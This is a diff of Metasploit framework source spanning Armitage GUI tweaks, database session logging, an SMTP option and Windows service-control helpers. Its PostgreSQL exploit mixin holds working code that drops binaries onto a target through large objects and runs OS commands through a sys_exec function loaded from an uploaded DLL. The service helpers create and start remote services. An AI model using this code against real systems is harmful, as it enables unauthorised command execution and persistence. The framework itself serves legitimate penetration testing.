if (charAt($msfdir, -1) ne "\\") {
$msfdir = "$msfdir $+ \\";
}
@ -472,6 +477,15 @@ sub _module_execute {
$host = "all";
}
# fix SMBPass and PASSWORD options if necessary...
if ("PASSWORD" in $3) {
$3['PASSWORD'] = fixPass($3['PASSWORD']);
}
if ("SMBPass" in $3) {
$3['SMBPass'] = fixPass($3['SMBPass']);
}
# okie then, let's create a console and execute all of this stuff...
local('$queue $key $value');
@ -607,3 +621,8 @@ sub initConsolePool {
[$client addHook: "console.release", $pool];
[$client addHook: "console.release_and_destroy", $pool];
}
sub fixPass {
return replace(strrep($1, '\\', '\\\\'), '(\p{Punct})', '\\\\$1');
}

7
external/source/armitage/src/cortana/Cortana.java vendored
View File

@ -428,13 +428,6 @@ public class Cortana implements Loadable, RuntimeWarningWatcher {
/* start the timer thread */
new cortana.support.Heartbeat(events).start();
/* regularly communicate with Metasploit or else our connection will drop */
new ArmitageTimer(client, "core.version", 200 * 1000L, new ArmitageTimerClient() {
public boolean result(String command, Object[] arguments, Map results) {
return true;
}
}, false);
}
started = true;
}

1
external/source/armitage/src/ui/ATable.java vendored
View File

@ -25,6 +25,7 @@ public class ATable extends JTable {
specialitems.add("SigningCert");
specialitems.add("WORDLIST");
specialitems.add("SESSION");
specialitems.add("REXE");
return new TableCellRenderer() {
public Component getTableCellRendererComponent(JTable table, Object value, boolean isSelected, boolean hasFocus, int row, int column) {

18
external/source/armitage/whatsnew.txt vendored
View File

@ -1,6 +1,24 @@
Armitage Changelog
==================
4 Jan 13 (tested against msf 16252)
--------
- Added a helper to set REXE option
- Added an icon to represent Windows 8
- [host] -> Login menu is now built using open services for all
highlighted hosts, not just the first one.
- [host] -> Login items now escape punctuation characters in passwords
before passing them to a framework module.
- Added the windows and linux postgres_payload exploits to the use a
reverse payload by default list.
- Small tweak to allow Armitage to work with Metasploit 4.5 installed
environment on Windows.
Cortana Updates (for scripters)
--------
- &credential_add and &credential_delete no longer break when a
password has creative punctuation in it.
26 Nov 12 (tested against msf 16114)
---------
- Windows command shell tab is now friendlier to commands that prompt

2
lib/msf/core/auxiliary/nmap.rb
View File

@ -224,7 +224,7 @@ def nmap_validate_arg(str)
disallowed_characters = /([\x00-\x19\x21\x23-\x26\x28\x29\x3b\x3e\x60\x7b\x7c\x7d\x7e-\xff])/n
badchar = str[disallowed_characters]
if badchar
print_error "Malformed nmap arguments (contains '#{c}'): #{str}"
print_error "Malformed nmap arguments (contains '#{badchar}'): #{str}"
return false
end
# Check for commas outside of quoted arguments

31
lib/msf/core/db.rb
View File

@ -675,6 +675,13 @@ class DBManager
if sess_data[:desc]
sess_data[:desc] = sess_data[:desc][0,255]
end
# In the case of multi handler we cannot yet determine the true
# exploit responsible. But we can at least show the parent versus
# just the generic handler:
if session.via_exploit == "exploit/multi/handler"
sess_data[:via_exploit] = sess_data[:datastore]['ParentModule']
end
s = ::Mdm::Session.new(sess_data)
s.save!
@ -684,19 +691,26 @@ class DBManager
end
# If this is a live session, we know the host is vulnerable to something.
# If the exploit used was multi/handler, though, we don't know what
# it's vulnerable to, so it isn't really useful to save it.
if opts[:session] and session.via_exploit and session.via_exploit != "exploit/multi/handler"
if opts[:session] and session.via_exploit
return unless host
mod = framework.modules.create(session.via_exploit)
if session.via_exploit == "exploit/multi/handler"
mod_fullname = sess_data[:datastore]['ParentModule']
mod_name = ::Mdm::ModuleDetail.find_by_fullname(mod_fullname).name
else
mod_name = mod.name
mod_fullname = mod.fullname
end
vuln_info = {
:host => host.address,
:name => mod.name,
:name => mod_name,
:refs => mod.references,
:workspace => wspace,
:exploited_at => Time.now.utc,
:info => "Exploited by #{mod.fullname} to create Session #{s.id}"
:info => "Exploited by #{mod_fullname} to create Session #{s.id}"
}
port = session.exploit_datastore["RPORT"]
@ -706,10 +720,15 @@ class DBManager
vuln = framework.db.report_vuln(vuln_info)
if session.via_exploit == "exploit/multi/handler"
via_exploit = sess_data[:datastore]['ParentModule']
else
via_exploit = session.via_exploit
end
attempt_info = {
:timestamp => Time.now.utc,
:workspace => wspace,
:module => session.via_exploit,
:module => via_exploit,
:username => session.username,
:refs => mod.references,
:session_id => s.id,

251
lib/msf/core/exploit/postgres.rb
View File

@ -13,10 +13,13 @@ module Exploit::Remote::Postgres
require 'postgres_msf'
require 'base64'
include Msf::Db::PostgresPR
# @!attribute [rw] postgres_conn
# @return [::Msf::Db::PostgresPR::Connection]
attr_accessor :postgres_conn
#
# Creates an instance of a MSSQL exploit module.
# Creates an instance of a PostgreSQL exploit module.
#
def initialize(info = {})
super
@ -38,27 +41,66 @@ module Exploit::Remote::Postgres
register_autofilter_services(%W{ postgres })
end
# postgres_login takes a number of arguments (defaults to the datastore for
# appropriate values), and will either populate self.postgres_conn and return
# :connected, or will return :error, :error_databse, or :error_credentials
# Fun fact: if you get :error_database, it means your username and password
# was accepted (you just failed to guess a correct running database instance).
# Note that postgres_login will first trigger postgres_logout if the module
# is already connected.
def postgres_login(args={})
# @!group Datastore accessors
# Return the datastore value of the same name
# @return [String] IP address of the target
def rhost; datastore['RHOST']; end
# Return the datastore value of the same name
# @return [Fixnum] TCP port where the target service is running
def rport; datastore['RPORT']; end
# Return the datastore value of the same name
# @return [String] Username for authentication
def username; datastore['USERNAME']; end
# Return the datastore value of the same name
# @return [String] Password for authentication
def password; datastore['PASSWORD']; end
# Return the datastore value of the same name
# @return [String] Database to connect to when authenticating
def database; datastore['DATABASE']; end
# Return the datastore value of the same name
# @return [Boolean] Whether to print verbose output
def verbose; datastore['VERBOSE']; end
# @!endgroup
# Takes a number of arguments (defaults to the datastore for appropriate
# values), and will either populate {#postgres_conn} and return
# +:connected+, or will return +:error+, +:error_databse+, or
# +:error_credentials+ in case of an error.
#
# Fun fact: if you get +:error_database+, it means your username and
# password was accepted (you just failed to guess a correct running database
# instance).
#
# @note This method will first call {#postgres_logout} if the module is
# already connected.
#
# @param opts [Hash] Options for authenticating
# @option opts [String] :database The database
# @option opts [String] :username The username
# @option opts [String] :username The username
# @option opts [String] :server IP address or hostname of the target server
# @option opts [Fixnum] :port TCP port on :server
#
# @return [:error_database] if user/pass are correct but database is wrong
# @return [:error_credentials] if user/pass are wrong
# @return [:error] if some other error occurred
# @return [:connected] if everything went as planned
def postgres_login(opts={})
postgres_logout if self.postgres_conn
db = args[:database] || datastore['DATABASE']
username = args[:username] || datastore['USERNAME']
password = args[:password] || datastore['PASSWORD']
ip = args[:server] || datastore['RHOST']
port = args[:port] || datastore['RPORT']
db = opts[:database] || datastore['DATABASE']
username = opts[:username] || datastore['USERNAME']
password = opts[:password] || datastore['PASSWORD']
ip = opts[:server] || datastore['RHOST']
port = opts[:port] || datastore['RPORT']
uri = "tcp://#{ip}:#{port}"
if Rex::Socket.is_ipv6?(ip)
uri = "tcp://[#{ip}]:#{port}"
end
verbose = args[:verbose] || datastore['VERBOSE']
verbose = opts[:verbose] || datastore['VERBOSE']
begin
self.postgres_conn = Connection.new(db,username,password,uri)
rescue RuntimeError => e
@ -80,7 +122,9 @@ module Exploit::Remote::Postgres
end
end
# Logs out of a database instance.
# Logs out of a database instance and sets {#postgres_conn} to nil
#
# @return [void]
def postgres_logout
ip = datastore['RHOST']
port = datastore['RPORT']
@ -92,9 +136,13 @@ module Exploit::Remote::Postgres
print_status "#{ip}:#{port} Postgres - Disconnected" if verbose
end
# If not currently connected, postgres_query will attempt to connect. If an
# If not currently connected, attempt to connect. If an
# error is encountered while executing the query, it will return with
# :error ; otherwise, it will return with :complete.
#
# @param sql [String] The query to run
# @param doprint [Boolean] Whether the result should be printed
# @return [Hash]
def postgres_query(sql=nil,doprint=false)
ip = datastore['RHOST']
port = datastore['RPORT']
@ -104,7 +152,7 @@ module Exploit::Remote::Postgres
end
if self.postgres_conn
sql ||= datastore['SQL']
print_status "#{ip}:#{port} Postgres - querying with '#{sql}'" if datastore['VERBOSE']
vprint_status "#{ip}:#{port} Postgres - querying with '#{sql}'"
begin
resp = self.postgres_conn.query(sql)
rescue RuntimeError => e
@ -151,15 +199,21 @@ module Exploit::Remote::Postgres
return :complete
end
# postgres_fingerprint attempts to fingerprint a remote Postgresql instance,
# inferring version number from the failed authentication messages.
# Attempts to fingerprint a remote PostgreSQL instance, inferring version
# number from the failed authentication messages or simply returning the
# result of "select version()" if authentication was successful.
#
# @return [Hash] A hash containing the version in one of the keys :preauth,
# :auth, or :unkown, depending on how it was determined
# @see #postgres_authed_fingerprint
# @see #analyze_auth_error
def postgres_fingerprint(args={})
return postgres_authed_fingerprint if self.postgres_conn
db = args[:database] || datastore['DATABASE']
username = args[:username] || datastore['USERNAME']
password = args[:password] || datastore['PASSWORD']
rhost = args[:server] || datastore['RHOST']
rport = args[:port] || datastore['RPORT']
rhost = args[:server] || datastore['RHOST']
rport = args[:port] || datastore['RPORT']
uri = "tcp://#{rhost}:#{rport}"
if Rex::Socket.is_ipv6?(rhost)
@ -176,6 +230,10 @@ module Exploit::Remote::Postgres
return postgres_authed_fingerprint if self.postgres_conn
end
# Ask the server what its version is
#
# @return (see #postgres_fingerprint)
# @see #postgres_fingerprint
def postgres_authed_fingerprint
resp = postgres_query("select version()",false)
ver = resp[:complete].rows[0][0]
@ -185,6 +243,10 @@ module Exploit::Remote::Postgres
# Matches up filename, line number, and routine with a version.
# These all come from source builds of Postgres. TODO: check
# in on the binary distros, see if they're different.
#
# @param e [RuntimeError] The exception raised by Connection.new
# @return (see #postgres_fingerprint)
# @see #postgres_fingerprint
def analyze_auth_error(e)
fname,fline,froutine = e.to_s.split("\t")[3,3]
fingerprint = "#{fname}:#{fline}:#{froutine}"
@ -223,14 +285,26 @@ module Exploit::Remote::Postgres
when "Fauth.c:L273:Rauth_failed" ; return {:preauth => "8.4.2"} # Failed (bad db, bad credentials)
when "Fauth.c:L364:RClientAuthentication" ; return {:preauth => "8.4.2"} # Rejected (maybe good)
when "Fmiscinit.c:L432:RInitializeSessionUserId" ; return {:preauth => "9.1.5"} # Failed (bad db, bad credentials)
when "Fpostinit.c:L709:RInitPostgres" ; return {:preauth => "9.1.5"} # Failed (bad db, good credentials)
when "Fauth.c:L302:Rauth_failed" ; return {:preauth => "9.1.6"} # Bad password, good database
when "Fpostinit.c:L718:RInitPostgres" ; return {:preauth => "9.1.6"} # Good creds, non-existent but allowed database
when "Fauth.c:L483:RClientAuthentication" ; return {:preauth => "9.1.6"} # Bad user
# Windows
when 'F.\src\backend\libpq\auth.c:L273:Rauth_failed' ; return {:preauth => "8.4.2-Win"} # Failed (bad db, bad credentials)
when 'F.\src\backend\utils\init\postinit.c:L422:RInitPostgres' ; return {:preauth => "8.4.2-Win"} # Failed (bad db, good credentials)
when 'F.\src\backend\libpq\auth.c:L359:RClientAuthentication' ; return {:preauth => "8.4.2-Win"} # Rejected (maybe good)
when 'F.\src\backend\libpq\auth.c:L464:RClientAuthentication' ; return {:preauth => "9.0.3-Win"} # Rejected (not allowed in pg_hba.conf)
when 'F.\src\backend\libpq\auth.c:L297:Rauth_failed' ; return {:preauth => "9.0.3-Win"} # Rejected (bad db or bad creds)
when 'Fsrc\backend\libpq\auth.c:L302:Rauth_failed' ; return {:preauth => "9.2.1-Win"} # Rejected (bad db or bad creds)
when 'Fsrc\backend\utils\init\postinit.c:L717:RInitPostgres' ; return {:preauth => "9.2.1-Win"} # Failed (bad db, good credentials)
when 'Fsrc\backend\libpq\auth.c:L479:RClientAuthentication' ; return {:preauth => "9.2.1-Win"} # Rejected (not allowed in pg_hba.conf)
# OpenSolaris (thanks Alexander!)
when 'Fmiscinit.c:L420:' ; return {:preauth => '8.2.6-8.2.13-OpenSolaris'} # Failed (good db, bad credentials)
@ -243,6 +317,8 @@ module Exploit::Remote::Postgres
end
end
# @return [String] The password as provided by the user or a random one if
# none has been given.
def postgres_password
if datastore['PASSWORD'].to_s.size > 0
datastore['PASSWORD'].to_s
@ -252,7 +328,7 @@ module Exploit::Remote::Postgres
end
# This presumes the user has rights to both the file and to create a table.
# If not, postgre_query() will return an error (usually :sql_error),
# If not, {#postgres_query} will return an error (usually :sql_error),
# and it should be dealt with by the caller.
def postgres_read_textfile(filename)
# Check for temp table creation privs first.
@ -267,6 +343,8 @@ module Exploit::Remote::Postgres
return postgres_query(read_query,true)
end
# @return [Boolean] Whether the current user has privilege +priv+ on the
# current database
def postgres_has_database_privilege(priv)
sql = %Q{select has_database_privilege(current_user,current_database(),'#{priv}')}
ret = postgres_query(sql,false)
@ -278,8 +356,9 @@ module Exploit::Remote::Postgres
end
# Creates the function sys_exec() in the pg_temp schema.
# @deprecated Just get a real shell instead
def postgres_create_sys_exec(dll)
q = "create or replace function pg_temp.sys_exec(text) returns int4 as '#{dll}', 'sys_exec' language C returns null on null input immutable"
q = "create or replace function pg_temp.sys_exec(text) returns int4 as '#{dll}', 'sys_exec' language c returns null on null input immutable"
resp = postgres_query(q);
if resp[:sql_error]
print_error "Error creating pg_temp.sys_exec: #{resp[:sql_error]}"
@ -290,6 +369,8 @@ module Exploit::Remote::Postgres
# This presumes the pg_temp.sys_exec() udf has been installed, almost
# certainly by postgres_create_sys_exec()
#
# @deprecated Just get a real shell instead
def postgres_sys_exec(cmd)
print_status "Attempting to Execute: #{cmd}"
q = "select pg_temp.sys_exec('#{cmd}')"
@ -302,88 +383,106 @@ module Exploit::Remote::Postgres
end
# Takes a local filename and uploads it into a table as a Base64 encoded string.
# Returns an array if successful, false if not.
# Uploads the given local file to the remote server
#
# @param fname [String] Name of a file on the local filesystem to be
# uploaded
# @param remote_fname (see #postgres_upload_binary_data)
# @return (see #postgres_upload_binary_data)
def postgres_upload_binary_file(fname, remote_fname=nil)
data = File.read(fname)
postgres_upload_binary_data(data, remote_fname)
end
# Writes data to disk on the target server.
#
# This is accomplished in 5 steps:
# 1. Create a new object with "select lo_create(-1)"
# 2. Delete any resulting rows in pg_largeobject table.
# On 8.x and older, postgres inserts rows as a result of the call to
# lo_create. Deleting them here approximates the state on 9.x where no
# such insert happens.
# 3. Break the data into LOBLOCKSIZE-byte chunks.
# 4. Insert each of the chunks as a row in pg_largeobject
# 5. Select lo_export to write the file to disk
#
# @param data [String] Raw binary to write to disk
# @param remote_fname [String] Name of the file on the remote server where
# the data will be stored. Default is "<random>.dll"
# @return [nil] if any part of this process failed
# @return [String] if everything went as planned, the name of the file we
# dropped. This is really only useful if +remote_fname+ is nil
def postgres_upload_binary_data(data, remote_fname=nil)
data = postgres_base64_data(data)
tbl,fld = postgres_create_stager_table
return false unless data && tbl && fld
q = "insert into #{tbl}(#{fld}) values('#{data}')"
resp = postgres_query(q)
if resp[:sql_error]
print_error resp[:sql_error]
return false
end
oid, fout = postgres_write_data_to_disk(tbl,fld,remote_fname)
return false unless oid && fout
return [tbl,fld,fout,oid]
end
# Writes b64 data from a table field, decoded, to disk.
#
# This is accomplished with 3 sql queries:
# 1. select lo_create
# 2. version dependant:
# - on 9.x, insert into pg_largeobject
# - on older versions, update pg_largeobject
# 3. select lo_export to write the file to disk
#
def postgres_write_data_to_disk(tbl,fld,remote_fname=nil)
oid = rand(60000) + 1000
remote_fname ||= Rex::Text::rand_text_alpha(8) + ".dll"
ver = postgres_fingerprint
case ver[:auth]
when /PostgreSQL 9\./
# 9.x does *not* insert the largeobject into the table when you do
# the lo_create, so we must insert it ourselves.
queries = [
"select lo_create(#{oid})",
"insert into pg_largeobject select #{oid}, 0, decode((select #{fld} from #{tbl}), 'base64')",
"select lo_export(#{oid}, '#{remote_fname}')"
]
else
# 8.x inserts the largeobject into the table when you do the
# lo_create, so we with a value.
#
# 7.x is an unknown, but this behavior was the default before the
# addition of support for 9.x above, so try it this way and hope
# for the best
queries = [
"select lo_create(#{oid})",
"update pg_largeobject set data=(decode((select #{fld} from #{tbl}), 'base64')) where loid=#{oid}",
"select lo_export(#{oid}, '#{remote_fname}')"
]
# From the Postgres documentation:
# SELECT lo_creat(-1); -- returns OID of new, empty large object
# Doing it this way instead of calling lo_create with a random number
# ensures that we don't accidentally hit the id of a real object.
resp = postgres_query "select lo_creat(-1)"
unless resp and resp[:complete] and resp[:complete].rows[0]
print_error "Failed to get a new loid"
return
end
oid = resp[:complete].rows[0][0].to_i
queries = [ "delete from pg_largeobject where loid=#{oid}" ]
# Break the data into smaller chunks that can fit in the size allowed in
# the pg_largeobject data column.
# From the postgres documentation:
# "The amount of data per page is defined to be LOBLKSIZE (which is
# currently BLCKSZ/4, or typically 2 kB)."
# Empirically, it seems that 8kB is fine on 9.x, but we play it safe and
# stick to 2kB.
chunks = []
while ((c = data.slice!(0..2047)) && c.length > 0)
chunks.push c
end
chunks.each_with_index do |chunk, pageno|
b64_data = postgres_base64_data(chunk)
insert = "insert into pg_largeobject (loid,pageno,data) values(%d, %d, decode('%s', 'base64'))"
queries.push( "#{insert}"%[oid, pageno, b64_data] )
end
queries.push "select lo_export(#{oid}, '#{remote_fname}')"
# Now run each of the queries we just built
queries.each do |q|
resp = postgres_query(q)
if resp && resp[:sql_error]
print_error "Could not write the library to disk."
print_error resp[:sql_error]
break
# Can't really recover from this, bail
return nil
end
end
return oid,remote_fname
return remote_fname
end
# Base64's a file and returns the data.
# Calls {#postgres_base64_data} with the contents of file +fname+
#
# @param fname [String] Name of a file on the local system
# @return (see #postgres_base64_data)
def postgres_base64_file(fname)
data = File.open(fname, "rb") {|f| f.read f.stat.size}
postgres_base64_data(data)
end
# Converts data to base64 with no newlines
#
# @param data [String] Raw data to be base64'd
# @return [String] A base64 string suitable for passing to postgresql's
# decode(..., 'base64') function
def postgres_base64_data(data)
[data].pack("m*").gsub(/\r?\n/,"")
end
# Creates a temporary table to store base64'ed binary data in.
#
# @deprecated No longer necessary since we can insert base64 data directly
def postgres_create_stager_table
tbl = Rex::Text.rand_text_alpha(8).downcase
fld = Rex::Text.rand_text_alpha(8).downcase

7
lib/msf/core/exploit/smtp_deliver.rb
View File

@ -31,6 +31,7 @@ module Exploit::Remote::SMTPDeliver
OptString.new('SUBJECT', [ true, 'Subject line of the email' ]),
OptString.new('USERNAME', [ false, 'SMTP Username for sending email', '' ]),
OptString.new('PASSWORD', [ false, 'SMTP Password for sending email', '' ]),
OptString.new('DOMAIN', [false, 'SMTP Domain to EHLO to', '']),
OptString.new('VERBOSE', [ false, 'Display verbose information' ]),
], Msf::Exploit::Remote::SMTPDeliver)
register_autofilter_ports([ 25, 465, 587, 2525, 25025, 25000])
@ -72,7 +73,11 @@ module Exploit::Remote::SMTPDeliver
print_verbose("Connecting to SMTP server #{rhost}:#{rport}...")
nsock = connect(global)
domain = Rex::Text.rand_text_alpha(rand(32)+1)
if datastore['DOMAIN'] and not datastore['DOMAIN'] == ''
domain = datastore['DOMAIN']
else
domain = Rex::Text.rand_text_alpha(rand(32)+1)
end
res = raw_send_recv("EHLO #{domain}\r\n", nsock)
if res =~ /STARTTLS/

4
lib/msf/core/framework.rb
View File

@ -17,9 +17,9 @@ class Framework
#
Major = 4
Minor = 5
Minor = 6
Point = 0
Release = "-release"
Release = "-dev"
if(Point)
Version = "#{Major}.#{Minor}.#{Point}#{Release}"

58
lib/msf/core/module/deprecated.rb Normal file
View File

@ -0,0 +1,58 @@
module Msf::Module::Deprecated
# Additional class methods for deprecated modules
module ClassMethods
# Mark this module as deprecated
#
# Any time this module is run it will print warnings to that effect.
#
# @param deprecation_date [Date,#to_s] The date on which this module will
# be removed
# @param replacement_module [String] The name of a module that users
# should be using instead of this deprecated one
# @return [void]
def deprecated(deprecation_date=nil, replacement_module=nil)
# Yes, class instance variables.
@replacement_module = replacement_module
@deprecation_date = deprecation_date
end
# The name of a module that users should be using instead of this
# deprecated one
#
# @return [String,nil]
# @see ClassMethods#deprecated
def replacement_module; @replacement_module; end
# The date on which this module will be removed
#
# @return [Date,nil]
# @see ClassMethods#deprecated
def deprecation_date; @deprecation_date; end
end
# (see ClassMethods#replacement_module)
def replacement_module; self.class.replacement_module; end
# (see ClassMethods#deprecation_date)
def deprecation_date; self.class.deprecation_date; end
# Extends with {ClassMethods}
def self.included(base)
base.extend(ClassMethods)
end
def setup
print_warning("*"*72)
print_warning("*%red"+"This module is deprecated!".center(70)+"%clr*")
if deprecation_date
print_warning("*"+"It will be removed on or about #{deprecation_date}".center(70)+"*")
end
if replacement_module
print_warning("*"+"Use #{replacement_module} instead".center(70)+"*")
end
print_warning("*"*72)
super
end
end

12
lib/msf/core/payload/php.rb
View File

@ -12,10 +12,10 @@ module Msf::Payload::Php
#
# The generated code will initialize
#
# @options options [String] :disabled_varname PHP variable name in which to
# @option options [String] :disabled_varname PHP variable name in which to
# store an array of disabled functions.
#
# @returns [String] A chunk of PHP code
# @return [String] A chunk of PHP code
#
def php_preamble(options = {})
dis = options[:disabled_varname] || '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
@ -42,15 +42,15 @@ module Msf::Payload::Php
#
# Generate a chunk of PHP code that tries to run a command.
#
# @options options [String] :cmd_varname PHP variable name containing the
# @option options [String] :cmd_varname PHP variable name containing the
# command to run
# @options options [String] :disabled_varname PHP variable name containing
# @option options [String] :disabled_varname PHP variable name containing
# an array of disabled functions. See #php_preamble
# @options options [String] :output_varname PHP variable name in which to
# @option options [String] :output_varname PHP variable name in which to
# store the output of the command. Will contain 0 if no exec functions
# work.
#
# @returns [String] A chunk of PHP code that, with a little luck, will run a
# @return [String] A chunk of PHP code that, with a little luck, will run a
# command.
#
def php_system_block(options = {})

290
lib/msf/core/post/windows/services.rb
View File

@ -5,34 +5,108 @@ module Msf
class Post
module Windows
# @deprecated Use {Services} instead
module WindowsServices
def self.included(base)
include Services
end
def setup
print_error("The Windows::WindowsServices mixin is deprecated, use Windows::Services instead")
super
end
end
#
# Post module mixin for dealing with Windows services
#
module Services
include ::Msf::Post::Windows::Registry
#
# List all Windows Services present. Returns an Array containing the names
# of the services.
# Open the service manager with advapi32.dll!OpenSCManagerA on the
# given host or the local machine if :host option is nil. If called
# with a block, yields the manager and closes it when the block
# returns.
#
# @param opts [Hash]
# @option opts [String] :host (nil) The host on which to open the
# service manager. May be a hostname or IP address.
# @option opts [Fixnum] :access (0xF003F) Bitwise-or of the
# SC_MANAGER_* constants (see
# {http://msdn.microsoft.com/en-us/library/windows/desktop/ms685981(v=vs.85).aspx})
#
# @return [Fixnum] Opaque Windows handle SC_HANDLE as returned by
# OpenSCManagerA()
# @yield [manager] Gives the block a manager handle as returned by
# advapi32.dll!OpenSCManagerA. When the block returns, the handle
# will be closed with {#close_sc_manager}.
# @raise [RuntimeError] if OpenSCManagerA returns a NULL handle
#
def open_sc_manager(opts={})
host = opts[:host] || nil
access = opts[:access] || 0xF003F
machine_str = host ? "\\\\#{host}" : nil
# SC_HANDLE WINAPI OpenSCManager(
# _In_opt_ LPCTSTR lpMachineName,
# _In_opt_ LPCTSTR lpDatabaseName,
# _In_ DWORD dwDesiredAccess
# );
manag = session.railgun.advapi32.OpenSCManagerA(machine_str,nil,access)
if (manag["return"] == 0)
raise RuntimeError.new("Unable to open service manager, GetLastError: #{manag["GetLastError"]}")
end
if (block_given?)
begin
yield manag["return"]
ensure
close_sc_manager(manag["return"])
end
else
return manag["return"]
end
end
#
# Call advapi32.dll!CloseServiceHandle on the given handle
#
def close_sc_manager(handle)
if handle
session.railgun.advapi32.CloseServiceHandle(handle)
end
end
#
# List all Windows Services present
#
# @return [Array] The names of the services.
#
# @todo Rewrite to allow operating on a remote host
#
def service_list
serviceskey = "HKLM\\SYSTEM\\CurrentControlSet\\Services"
threadnum = 0
a =[]
services = []
registry_enumkeys(serviceskey).each do |s|
if threadnum < 10
a.push(::Thread.new(s) { |sk|
begin
srvtype = registry_getvaldata("#{serviceskey}\\#{sk}","Type").to_s
if srvtype =~ /32|16/
services << sk
end
rescue
end
})
threadnum += 1
else
sleep(0.05) and a.delete_if {|x| not x.alive?} while not a.empty?
threadnum = 0
keys = registry_enumkeys(serviceskey)
keys.each do |s|
if a.length >= 10
a.first.join
a.delete_if {|x| not x.alive?}
end
t = framework.threads.spawn(self.refname+"-ServiceRegistryList",false,s) { |sk|
begin
srvtype = registry_getvaldata("#{serviceskey}\\#{sk}","Type").to_s
if srvtype == "32" or srvtype == "16"
services << sk
end
rescue
end
}
a.push(t)
end
return services
@ -45,6 +119,13 @@ module WindowsServices
# command executed by the service. Service name is case sensitive. Hash
# keys are Name, Start, Command and Credentials.
#
# @param name [String] The target service's name (not to be confused
# with Display Name). Case sensitive.
#
# @return [Hash]
#
# @todo Rewrite to allow operating on a remote host
#
def service_info(name)
service = {}
servicekey = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\#{name.chomp}"
@ -68,6 +149,8 @@ module WindowsServices
# Mode is a string with either auto, manual or disable for the
# corresponding setting. The name of the service is case sensitive.
#
# @todo Rewrite to allow operating on a remote host
#
def service_change_startup(name,mode)
servicekey = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\#{name.chomp}"
case mode.downcase
@ -81,22 +164,30 @@ module WindowsServices
end
#
# Create a service that runs it's own process.
# Create a service that runs +executable_on_host+ on the session host
#
# It takes as values the service name as string, the display name as
# string, the path of the executable on the host that will execute at
# startup as string and the startup type as an integer of 2 for Auto, 3 for
# Manual or 4 for Disable, default Auto.
# @param name [String] Name of the service to be used as the key
# @param display_name [String] Name of the service as displayed by mmc
# @param executable_on_host [String] EXE on the remote filesystem to
# be used as the service executable
# @param startup [Fixnum] Constant used by CreateServiceA for startup
# type: 2 for Auto, 3 for Manual, 4 for Disable. Default is Auto
# @param server [String,nil] A hostname or IP address. Default is the
# remote localhost
#
# @return [true,false] True if there were no errors, false otherwise
#
def service_create(name, display_name, executable_on_host, startup=2, server=nil)
machine_str = server ? "\\\\#{server}" : nil
adv = session.railgun.advapi32
manag = adv.OpenSCManagerA(machine_str,nil,0x13)
if(manag["return"] != 0)
# SC_MANAGER_CONNECT 0x01
# SC_MANAGER_CREATE_SERVICE 0x02
# SC_MANAGER_QUERY_LOCK_STATUS 0x10
open_sc_manager(:host=>server, :access=>0x13) do |manager|
# SC_HANDLE WINAPI CreateService(
# __in SC_HANDLE hSCManager,
# __in LPCTSTR lpServiceName,
# __in_opt LPCTSTR lpDisplayName,
# __in_opt LPCTSTR lpDisplayName,
# __in DWORD dwDesiredAccess,
# __in DWORD dwServiceType,
# __in DWORD dwStartType,
@ -108,113 +199,112 @@ module WindowsServices
# __in_opt LPCTSTR lpServiceStartName,
# __in_opt LPCTSTR lpPassword
#);
# SC_MANAGER_CREATE_SERVICE = 0x0002
newservice = adv.CreateServiceA(manag["return"],name,display_name,
0x0010,0X00000010,startup,0,executable_on_host,nil,nil,nil,nil,nil)
newservice = adv.CreateServiceA(manager, name, display_name,
0x0010, 0X00000010, startup, 0, executable_on_host,
nil, nil, nil, nil, nil)
adv.CloseServiceHandle(newservice["return"])
adv.CloseServiceHandle(manag["return"])
#SERVICE_START=0x0010 SERVICE_WIN32_OWN_PROCESS= 0X00000010
#SERVICE_AUTO_START = 2 SERVICE_ERROR_IGNORE = 0
if newservice["GetLastError"] == 0
return true
else
return false
end
else
raise "Could not open Service Control Manager, Access Denied"
end
end
#
# Start a service.
#
# Returns 0 if service started, 1 if service is already started and 2 if
# service is disabled.
# @param name [String] Service name (not display name)
# @param server [String,nil] A hostname or IP address. Default is the
# remote localhost
#
# @return [Fixnum] 0 if service started successfully, 1 if it failed
# because the service is already running, 2 if it is disabled
#
# @raise [RuntimeError] if OpenServiceA failed
#
def service_start(name, server=nil)
machine_str = server ? "\\\\#{server}" : nil
adv = session.railgun.advapi32
manag = adv.OpenSCManagerA(machine_str,nil,1)
if(manag["return"] == 0)
raise "Could not open Service Control Manager, Access Denied"
end
#open with SERVICE_START (0x0010)
servhandleret = adv.OpenServiceA(manag["return"],name,0x10)
if(servhandleret["return"] == 0)
adv.CloseServiceHandle(manag["return"])
raise "Could not Open Service, Access Denied"
end
retval = adv.StartServiceA(servhandleret["return"],0,nil)
adv.CloseServiceHandle(servhandleret["return"])
adv.CloseServiceHandle(manag["return"])
if retval["GetLastError"] == 0
return 0
elsif retval["GetLastError"] == 1056
return 1
elsif retval["GetLastError"] == 1058
return 2
open_sc_manager(:host=>server, :access=>1) do |manager|
# SC_HANDLE WINAPI OpenService(
# _In_ SC_HANDLE hSCManager,
# _In_ LPCTSTR lpServiceName,
# _In_ DWORD dwDesiredAccess
# );
# open with access SERVICE_START (0x0010)
handle = adv.OpenServiceA(manager, name, 0x10)
if(handle["return"] == 0)
raise RuntimeError.new("Could not open service. OpenServiceA error: #{handle["GetLastError"]}")
end
retval = adv.StartServiceA(handle["return"],0,nil)
adv.CloseServiceHandle(handle["return"])
# This is terrible. Magic return values should be refactored to
# something meaningful.
case retval["GetLastError"]
when 0; return 0 # everything worked
when 1056; return 1 # service already started
when 1058; return 2 # service disabled
end
end
end
#
# Stop a service.
#
# Returns 0 if service is stopped successfully, 1 if service is already
# stopped or disabled and 2 if the service can not be stopped.
# @param (see #service_start)
# @return [Fixnum] 0 if service stopped successfully, 1 if it failed
# because the service is already stopped or disabled, 2 if it
# cannot be stopped for some other reason.
#
# @raise (see #service_start)
#
def service_stop(name, server=nil)
machine_str = server ? "\\\\#{server}" : nil
adv = session.railgun.advapi32
manag = adv.OpenSCManagerA(machine_str,nil,1)
if(manag["return"] == 0)
raise "Could not open Service Control Manager, Access Denied"
end
#open with SERVICE_STOP (0x0020)
servhandleret = adv.OpenServiceA(manag["return"],name,0x30)
if(servhandleret["return"] == 0)
adv.CloseServiceHandle(manag["return"])
raise "Could not Open Service, Access Denied"
end
retval = adv.ControlService(servhandleret["return"],1,56)
adv.CloseServiceHandle(servhandleret["return"])
adv.CloseServiceHandle(manag["return"])
if retval["GetLastError"] == 0
return 0
elsif retval["GetLastError"] == 1062
return 1
elsif retval["GetLastError"] == 1052
return 2
